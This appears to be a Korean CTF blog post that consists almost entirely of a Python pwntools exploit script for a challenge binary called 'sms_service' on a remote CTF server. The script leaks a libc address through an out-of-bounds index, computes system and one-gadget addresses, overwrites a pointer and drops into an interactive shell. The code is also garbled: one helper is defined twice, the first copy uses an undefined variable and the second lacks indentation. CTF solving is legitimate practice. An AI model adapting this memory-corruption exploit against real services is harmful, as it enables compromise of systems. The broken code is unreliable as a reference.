728x90

꿀잼 문제


from pwn import *

#s = process("./sms_service",env={'LD_PRELOAD':'./libc'})
s = remote("pwnable.shop",10001)

elf = ELF("./sms_service")

libc = ELF("./libc")


def soldier(name,index):
    s.recvuntil(">> ")
    s.sendline("1")
    s.recvuntil(">> ")
    s.sendline("1")
    s.recvuntil(">> ")
    s.send(name)
    s.recvuntil(">> ")
    s.sendline(str(index))
        


def citizen_set():
    s.recvuntil(">> ")
    s.sendline('2')
    s.recvuntil(">> ")
    s.send(cti_name)
    s.recvuntil(">> ")

def citizen_set(cti_name):
s.recvuntil(">> ")
s.sendline('2')
s.recvuntil(">> ")
s.sendline(cti_name)
    


def main():
    s.recvuntil(">> ")
    s.sendline("3")



soldier("\x00",-263011)

s.recvuntil("Msg : ")
leak = u64(s.recv(6)+"\x00\x00")
print "leak : " + hex(leak)
libc_base = leak - libc.symbols['puts']
system = libc_base + libc.symbols['system']
one_shot = libc_base + 0xf02a4
print "libc_base : " + hex(libc_base)
print "system : " + hex(system)
print "one_shot : " + hex(one_shot)
main()
#-19

citizen_set(p64(0x10539))
main()
soldier("A"*64,-19)
main()
soldier("\x00"*64,-19)
main()
soldier("JIWON",-263011)
main()
citizen_set("JIWON")
s.recvuntil(">> ")
s.sendline("1")
s.recvuntil(">> ")
s.sendline(p64(one_shot))


s.interactive()


'PWN > CTF' 카테고리의 다른 글

[Hackingcamp 19] guess  (0) 2019.02.20
[Hackingcamp 19] Orange  (0) 2019.02.20
[Asis 2015] math sequence  (0) 2019.02.15
[Asis 2016] b00ks  (0) 2019.02.06
[Codegate 2019] got-the-reum  (0) 2019.02.05